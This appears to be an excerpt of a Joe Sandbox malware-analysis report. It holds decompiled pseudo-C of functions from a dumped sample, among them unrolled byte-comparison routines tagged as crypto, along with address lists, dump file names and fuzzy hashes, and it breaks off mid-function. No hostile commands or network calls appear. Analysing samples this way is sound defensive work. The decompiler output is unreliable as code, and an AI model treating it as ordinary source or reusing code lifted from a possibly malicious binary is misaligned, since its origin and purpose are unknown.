									 *((intOrPtr*)(_t355 + 0x64)) =  *((intOrPtr*)(_t355 + 0x64)) + E00BC572A(_t323, (_t323 << 3) -  *(_t355 + 0x28));
									 *((intOrPtr*)(_t355 + 0x6c)) =  *((intOrPtr*)(_t355 + 0x6c)) + E00BC572A(_t323,  *(_t355 + 0x2c) + _t349);
									 *((intOrPtr*)(_t355 + 0x74)) =  *((intOrPtr*)(_t355 + 0x74)) + E00BC572A(_t323, _t349 -  *(_t355 + 0x1c));
									 *((intOrPtr*)(_t355 + 0x7c)) =  *((intOrPtr*)(_t355 + 0x7c)) + E00BC572A(_t323, _t349 +  *(_t355 + 0x1c));
									_t355 = _t355 + 0x1c;
									if(( *(_t355 + 0x30) & 0x0000001f) != 0) {
										_t345 =  *(_t355 + 0x18);
										_t238 =  *(_t355 + 0x14);
									} else {
										_t324 =  *(_t355 + 0x48);
										_t266 = 0;
										 *(_t355 + 0x48) =  *(_t355 + 0x48) & 0;
										_t308 = 1;
										do {
											if( *(_t355 + 0x48 + _t308 * 4) < _t324) {
												_t324 =  *(_t355 + 0x48 + _t308 * 4);
												_t266 = _t308;
											}
											 *(_t355 + 0x48 + _t308 * 4) =  *(_t355 + 0x48 + _t308 * 4) & 0x00000000;
											_t308 = _t308 + 1;
										} while (_t308 < 7);
										_t345 =  *(_t355 + 0x18);
										_t267 = _t266 - 1;
										if(_t267 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t353 >= 0xfffffff0) {
												_t353 = _t353 - 1;
											}
											goto L49;
										}
										_t268 = _t267 - 1;
										if(_t268 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t353 < 0x10) {
												_t353 = _t353 + 1;
											}
											goto L49;
										}
										_t269 = _t268 - 1;
										if(_t269 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t345 < 0xfffffff0) {
												goto L49;
											}
											_t345 = _t345 - 1;
											L43:
											 *(_t355 + 0x18) = _t345;
											goto L49;
										}
										_t270 = _t269 - 1;
										if(_t270 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t345 >= 0x10) {
												goto L49;
											}
											_t345 = _t345 + 1;
											goto L43;
										}
										_t271 = _t270 - 1;
										if(_t271 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t238 < 0xfffffff0) {
												goto L49;
											}
											_t238 = _t238 - 1;
											L36:
											 *(_t355 + 0x14) = _t238;
											goto L49;
										}
										_t238 =  *(_t355 + 0x14);
										if(_t271 != 1 || _t238 >= 0x10) {
											goto L49;
										} else {
											_t238 = _t238 + 1;
											goto L36;
										}
									}
									L49:
									_t306 =  *(_t355 + 0x2c) + _t281;
									 *(_t355 + 0x30) =  *(_t355 + 0x30) + 1;
									 *(_t355 + 0x2c) = _t306;
								} while (_t306 <  *(_t355 + 0x38));
								_t336 =  *(_t355 + 0x3c);
							}
							_t336 = _t336 + 1;
							 *(_t355 + 0x3c) = _t336;
						} while (_t336 < _t281);
						goto L15;
					}
				}
				if(_t311 != 6) {
					goto L15;
				}
				_t309 = __ecx[5];
				_t354 = 0;
				_t325 = __ecx[1];
				 *(_t355 + 0x2c) = _t309;
				 *(_t355 + 0x30) = _t309 + _t309;
				if(_t309 > 0x20000 || _t325 > 0x400 || _t325 == 0) {
					goto L98;
				} else {
					_t274 = _t325;
					 *(_t355 + 0x28) = _t325;
					do {
						_t282 = 0;
						_t338 = _t309;
						if(_t309 <  *(_t355 + 0x30)) {
							_t310 =  *(_t355 + 0x30);
							goto L12;
							L12:
							_t275 =  *_t339;
							_t282 = _t282 -  *((intOrPtr*)(_t275 + _t354));
							_t354 = _t354 + 1;
							 *((char*)(_t275 + _t338)) = _t282;
							_t338 = _t338 + _t325;
							if(_t338 < _t310) {
								goto L12;
							} else {
								_t309 =  *(_t355 + 0x2c);
								_t274 =  *(_t355 + 0x28);
								goto L14;
							}
						}
						L14:
						_t309 = _t309 + 1;
						_t274 = _t274 - 1;
						 *(_t355 + 0x2c) = _t309;
						 *(_t355 + 0x28) = _t274;
					} while (_t274 != 0);
					goto L15;
				}
			}

0x00babd53
0x00babd5d
0x00babd62
0x00babdf9
0x00000000
0x00babdf9
0x00babd6b
0x00bac243
0x00bac246
0x00bac248
0x00bac24b
0x00bac254
0x00bac2b5
0x00000000
0x00bac2b5
0x00bac25c
0x00bac25e
0x00bac260
0x00bac266
0x00000000
0x00000000
0x00000000
0x00000000
0x00bac26c
0x00bac26c
0x00bac26c
0x00bac26e
0x00bac26f
0x00bac270
0x00bac274
0x00bac27a
0x00bac27e
0x00bac291
0x00bac299
0x00bac29d
0x00bac29d
0x00bac280
0x00bac285
0x00bac287
0x00bac28d
0x00bac28d
0x00bac285
0x00bac29f
0x00bac2a3
0x00bac2a6
0x00bac2a9
0x00bac2a9
0x00bac2ac
0x00000000
0x00bac2b0
0x00babd74
0x00bac17d
0x00bac17f
0x00bac188
0x00000000
0x00000000
0x00bac191
0x00bac194
0x00bac19a
0x00000000
0x00000000
0x00bac1a4
0x00bac1a5
0x00bac1a9
0x00bac1af
0x00bac1b2
0x00000000
0x00000000
0x00bac1b4
0x00bac1bc
0x00000000
0x00000000
0x00bac1be
0x00bac1c2
0x00bac1c4
0x00bac1c9
0x00bac1cd
0x00bac1d1
0x00bac1d2
0x00bac1d9
0x00bac1dd
0x00bac1ec
0x00bac207
0x00bac207
0x00bac20c
0x00bac210
0x00bac210
0x00bac214
0x00bac215
0x00bac218
0x00bac21c
0x00bac221
0x00bac225
0x00bac229
0x00bac229
0x00bac22c
0x00bac22d
0x00bac230
0x00bac234
0x00bac234
0x00000000
0x00bac23e
0x00babd7d
0x00bac031
0x00bac034
0x00bac037
0x00bac03a
0x00bac03e
0x00bac041
0x00bac048
0x00bac04c
0x00bac055
0x00000000
0x00bac06c
0x00bac06c
0x00bac06e
0x00bac072
0x00bac075
0x00bac079
0x00bac07d
0x00bac07f
0x00bac083
0x00bac087
0x00bac087
0x00bac08b
0x00000000
0x00000000
0x00bac091
0x00bac098
0x00bac09c
0x00bac09e
0x00bac0a2
0x00bac0a6
0x00bac0aa
0x00bac0ac
0x00bac0af
0x00bac0b7
0x00bac0bd
0x00bac0cb
0x00bac0e0
0x00bac0e4
0x00bac0e9
0x00bac0ed
0x00bac0f0
0x00bac0f6
0x00bac106
0x00bac10c
0x00bac110
0x00bac114
0x00bac116
0x00bac116
0x00bac0fc
0x00bac0fc
0x00bac100
0x00bac100
0x00bac0f6
0x00bac11a
0x00bac121
0x00bac124
0x00bac12c
0x00bac12f
0x00bac136
0x00bac136
0x00bac140
0x00bac144
0x00bac148
0x00bac14c
0x00bac14c
0x00bac14d
0x00bac151
0x00bac15a
0x00bac15e
0x00bac171
0x00bac163
0x00bac167
0x00bac16a
0x00bac16e
0x00bac16e
0x00000000
0x00bac175
0x00bac055
0x00babd86
0x00babe05
0x00babe08
0x00babe0a
0x00babe0d
0x00babe13
0x00babe17
0x00babe20
0x00000000
0x00babe3a
0x00babe3a
0x00babe3c
0x00babe42
0x00000000
0x00000000
0x00000000
0x00000000
0x00babe44
0x00babe44
0x00babe44
0x00babe4d
0x00babe52
0x00babe54
0x00babe59
0x00babe5b
0x00babe60
0x00babe68
0x00babe6c
0x00babe71
0x00babe75
0x00babe78
0x00babe80
0x00babe86
0x00babe8a
0x00babe8a
0x00babe98
0x00babe9c
0x00babea5
0x00babea9
0x00babead
0x00babed6
0x00babed8
0x00babee7
0x00babeeb
0x00babeef
0x00babef8
0x00babf08
0x00babf18
0x00babf28
0x00babf38
0x00babf46
0x00babf53
0x00babf57
0x00babf5f
0x00babffb
0x00babfff
0x00babf65
0x00babf65
0x00babf69
0x00babf6b
0x00babf71
0x00babf72
0x00babf76
0x00babf78
0x00babf7c
0x00babf7c
0x00babf7e
0x00babf83
0x00babf84
0x00babf89
0x00babf8d
0x00babf90
0x00babfef
0x00babff6
0x00babff8
0x00babff8
0x00000000
0x00babff6
0x00babf92
0x00babf95
0x00babfe3
0x00babfea
0x00babfec
0x00babfec
0x00000000
0x00babfea
0x00babf97
0x00babf9a
0x00babfd3
0x00babfda
0x00000000
0x00000000
0x00babfdc
0x00babfdd
0x00babfdd
0x00000000
0x00babfdd
0x00babf9c
0x00babf9f
0x00babfc7
0x00babfce
0x00000000
0x00000000
0x00babfd0
0x00000000
0x00babfd0
0x00babfa1
0x00babfa4
0x00babfbb
0x00babfc2
0x00000000
0x00000000
0x00babfc4
0x00babfb5
0x00babfb5
0x00000000
0x00babfb5
0x00babfa9
0x00babfad
0x00000000
0x00babfb4
0x00babfb4
0x00000000
0x00babfb4
0x00babfad
0x00bac003
0x00bac007
0x00bac009
0x00bac00d
0x00bac011
0x00bac01b
0x00bac01b
0x00bac01f
0x00bac020
0x00bac024
0x00000000
0x00bac02c
0x00babe20
0x00babd8b
0x00000000
0x00000000
0x00babd8d
0x00babd90
0x00babd92
0x00babd95
0x00babd9c
0x00babda6
0x00000000
0x00babdc0
0x00babdc0
0x00babdc2
0x00babdc6
0x00babdc6
0x00babdc8
0x00babdce
0x00babdd0
0x00babdd0
0x00babdd4
0x00babdd4
0x00babdd6
0x00babdd9
0x00babdda
0x00babddd
0x00babde1
0x00000000
0x00babde3
0x00babde3
0x00babde7
0x00000000
0x00babde7
0x00babde1
0x00babdeb
0x00babdeb
0x00babdec
0x00babdef
0x00babdf3
0x00babdf3
0x00000000
0x00babdc6

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e98dc1fc82524d90f59dd24fa930083f56017056710c88d4ed23a1b690d62d1c
Instruction ID: 5b61872bd197675c67af2a60b62984989a0d90d634cd772da9a6d013d66f3908
Opcode Fuzzy Hash: e98dc1fc82524d90f59dd24fa930083f56017056710c88d4ed23a1b690d62d1c
Instruction Fuzzy Hash: 7FF17971A0C3019FC724CF29C884A2ABBE1EFCA354F154AAEF4D697252D731E9458B52

Uniqueness

Uniqueness Score: -1.00%

Function 00BC0993 Relevance: .3, Instructions: 345
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00BC0993(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}

0x00bc0993
0x00bc0993
0x00bc0999
0x00bc0a20
0x00bc0a22
0x00bc0a24
0x00000000
0x00000000
0x00bc0a2a
0x00bc0a30
0x00bc0ab7
0x00bc0ab9
0x00bc0abb
0x00000000
0x00000000
0x00bc0ac1
0x00bc0ac7
0x00bc0b4e
0x00bc0b50
0x00bc0b52
0x00000000
0x00000000
0x00bc0b58
0x00bc0b5e
0x00bc0be5
0x00bc0be7
0x00bc0be9
0x00000000
0x00000000
0x00bc0bef
0x00bc0bf5
0x00bc0c7c
0x00bc0c7e
0x00bc0c80
0x00000000
0x00000000
0x00bc0c8c
0x00bc0d14
0x00bc0d16
0x00bc0d18
0x00000000
0x00000000
0x00bc0d1e
0x00bc0d24
0x00bc0dab
0x00bc0dad
0x00bc0daf
0x00bc0daf
0x00000000
0x00bc0daf
0x00bc0d31
0x00bc0d33
0x00bc0d4b
0x00bc0d53
0x00bc0d55
0x00bc0d6d
0x00bc0d75
0x00bc0d77
0x00bc0d8f
0x00bc0d97
0x00bc0d99
0x00bc0da2
0x00bc0da2
0x00000000
0x00bc0d99
0x00bc0d80
0x00bc0d89
0x00000000
0x00000000
0x00000000
0x00bc0d89
0x00bc0d5e
0x00bc0d67
0x00000000
0x00000000
0x00000000
0x00bc0d67
0x00bc0d3c
0x00bc0d45
0x00000000
0x00000000
0x00000000
0x00bc0d45
0x00bc0c9a
0x00bc0c9c
0x00bc0cb4
0x00bc0cbc
0x00bc0cbe
0x00bc0cd6
0x00bc0cde
0x00bc0ce0
0x00bc0cf8
0x00bc0d00
0x00bc0d02
0x00bc0d0b
0x00bc0d0b
0x00000000
0x00bc0d02
0x00bc0ce9
0x00bc0cf2
0x00000000
0x00000000
0x00000000
0x00bc0cf2
0x00bc0cc7
0x00bc0cd0
0x00000000
0x00000000
0x00000000
0x00bc0cd0
0x00bc0ca5
0x00bc0cae
0x00000000
0x00000000
0x00000000
0x00bc0cae
0x00bc0c02
0x00bc0c04
0x00bc0c1c
0x00bc0c24
0x00bc0c26
0x00bc0c3e
0x00bc0c46
0x00bc0c48
0x00bc0c60
0x00bc0c68
0x00bc0c6a
0x00bc0c73
0x00bc0c73
0x00000000
0x00bc0c6a
0x00bc0c51
0x00bc0c5a
0x00000000
0x00000000
0x00000000
0x00bc0c5a
0x00bc0c2f
0x00bc0c38
0x00000000
0x00000000
0x00000000
0x00bc0c38
0x00bc0c0d
0x00bc0c16
0x00000000
0x00000000
0x00000000
0x00bc0c16
0x00bc0b6b
0x00bc0b6d
0x00bc0b85
0x00bc0b8d
0x00bc0b8f
0x00bc0ba7
0x00bc0baf
0x00bc0bb1
0x00bc0bc9
0x00bc0bd1
0x00bc0bd3
0x00bc0bdc
0x00bc0bdc
0x00000000
0x00bc0bd3
0x00bc0bba
0x00bc0bc3
0x00000000
0x00000000
0x00000000
0x00bc0bc3
0x00bc0b98
0x00bc0ba1
0x00000000
0x00000000
0x00000000
0x00bc0ba1
0x00bc0b76
0x00bc0b7f
0x00000000
0x00000000
0x00000000
0x00bc0b7f
0x00bc0ad4
0x00bc0ad6
0x00bc0aee
0x00bc0af6
0x00bc0af8
0x00bc0b10
0x00bc0b18
0x00bc0b1a
0x00bc0b32
0x00bc0b3a
0x00bc0b3c
0x00bc0b45
0x00bc0b45
0x00000000
0x00bc0b3c
0x00bc0b23
0x00bc0b2c
0x00000000
0x00000000
0x00000000
0x00bc0b2c
0x00bc0b01
0x00bc0b0a
0x00000000
0x00000000
0x00000000
0x00bc0b0a
0x00bc0adf
0x00bc0ae8
0x00000000
0x00000000
0x00000000
0x00bc0ae8
0x00bc0a3d
0x00bc0a3f
0x00bc0a57
0x00bc0a5f
0x00bc0a61
0x00bc0a79
0x00bc0a81
0x00bc0a83
0x00bc0a9b
0x00bc0aa3
0x00bc0aa5
0x00bc0aae
0x00bc0aae
0x00000000
0x00bc0aa5
0x00bc0a8c
0x00bc0a95
0x00000000
0x00000000
0x00000000
0x00bc0a95
0x00bc0a6a
0x00bc0a73
0x00000000
0x00000000
0x00000000
0x00bc0a73
0x00bc0a48
0x00bc0a51
0x00000000
0x00000000
0x00000000
0x00bc099f
0x00bc099f
0x00bc09a6
0x00bc09a8
0x00bc09c0
0x00bc09c0
0x00bc09c8
0x00bc09ca
0x00bc09e2
0x00bc09e2
0x00bc09ea
0x00bc09ec
0x00bc0a04
0x00bc0a04
0x00bc0a0c
0x00bc0a0e
0x00bc0a17
0x00bc0a17
0x00000000
0x00bc0a0e
0x00bc09f2
0x00bc09f5
0x00bc09fe
0x00bc0556
0x00bc0556
0x00bc1347
0x00bc1347
0x00000000
0x00bc09fe
0x00bc09d0
0x00bc09d3
0x00bc09dc
0x00000000
0x00000000
0x00000000
0x00bc09dc
0x00bc09ae
0x00bc09b1
0x00bc09ba
0x00000000
0x00000000
0x00000000
0x00bc09ba

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 187a00e62f220a412a23ed9235d95494a567140fa966a454c9213c648efbde7f
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 77C1A5322251938ADB1D563D8574A3FBBE5DAA17B131A07EDE4B7CB0C5FE20C524DA10

Uniqueness

Uniqueness Score: -1.00%

Function 00BC0DC8 Relevance: .3, Instructions: 341
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00BC0DC8(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
